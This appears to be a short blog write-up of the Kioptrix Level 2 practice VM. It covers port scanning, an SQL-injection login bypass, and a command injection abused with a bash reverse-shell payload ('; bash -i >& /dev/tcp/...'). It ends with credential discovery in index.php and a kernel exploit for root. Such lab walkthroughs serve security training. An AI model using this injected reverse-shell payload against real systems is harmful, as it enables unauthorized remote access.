Monday, 11 July 2016

Kioptrix Level 2

This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.

In this case I used scanning all ports with version verification of services.

Fiest of all I verified port 111/tcp toward nfs, but unfortunately for us there isn't use nfs. So, OpenSSH looks as very old version and Apache as well.
I didn't find any exploit for OpenSSH, for Apache I found but only DoS, which is useless for us. I tried also connect to MySQL server but I have got following response
root@kali:~# mysql -u root -h
ERROR 1130 (HY000): Host '' is not allowed to connect to this MySQL server
So, let's go to the web application. In the default web page we have some kind of login form.

Great! There is SQL Injection vulnerability and I have obtained unauthorized access to the admin panel in so easy way.

and reponse points out that there may be Remote Code Execution vulnerability.

and let's perform Proof of Concept.

It works! So, exploitation should be very easy.
I have used following payload
; bash -i >& /dev/tcp/ 0>&1

Amazing! We have got limited shell. I examined target OS version and I found dedicated exploit to escalate our privileges, but unfortunately it isn't work.
So, I examined index.php file and I noticed something useful

Good! We have found valid credentials, let's try it use via SSH. Hmm it's not work. I logged into the MySQL server and I found credentials, unfortunately there only work for mysql. SO, let's find other exploit for the OS.
We are able to use exploit from and get root.

Game over